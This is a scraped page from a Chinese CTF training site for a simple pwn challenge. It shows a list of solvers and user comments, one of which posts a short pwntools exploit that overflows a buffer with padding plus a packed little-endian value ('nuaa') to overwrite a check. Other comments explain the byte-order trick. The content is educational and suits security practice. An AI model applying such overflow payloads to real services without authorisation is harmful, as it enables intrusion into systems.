评分(0)
暂无评分
解题动态

冰点泡沫 攻破了该题 4天前

略略略 攻破了该题 5天前

辰 攻破了该题 10天前

ysmilec 攻破了该题 1月前

854396873 攻破了该题 1月前

花落时相遇 攻破了该题 1月前

an 攻破了该题 1月前

Lolipop 攻破了该题 1月前

1505701406 攻破了该题 2月前

sigmas 攻破了该题 2月前

king123 攻破了该题 2月前

FutureEnter 攻破了该题 2月前

梦游的小狐狸 攻破了该题 2月前

13536169969 攻破了该题 2月前

shuanghu 攻破了该题 2月前

2115032105 攻破了该题 4月前

TOMCAT336699 攻破了该题 4月前

sumql 攻破了该题 5月前

.⎛⎝•̀ω•́⎠⎞. 攻破了该题 5月前

评论
怪我喽 1年前
举报
from pwn import* io = remote('82.157.146.43',15682) payload = b'A'*4+p64(1853186401) io.sendline(payload) io.interactive()
黑客小贺 1年前
举报
启动场景,然后放进Linux虚拟机里输入kkkkaaun
nil126 8月前
举报
@whoami12138 1853186401转换为16进制再转换为ascii就是nuaa,再考虑到小端序的存储方式将nuaa进行反转就是aaun,最后加上前面4个补位的字符就可以了。xxxxaaun
whoami12138 1年前
举报
大佬,原理是啥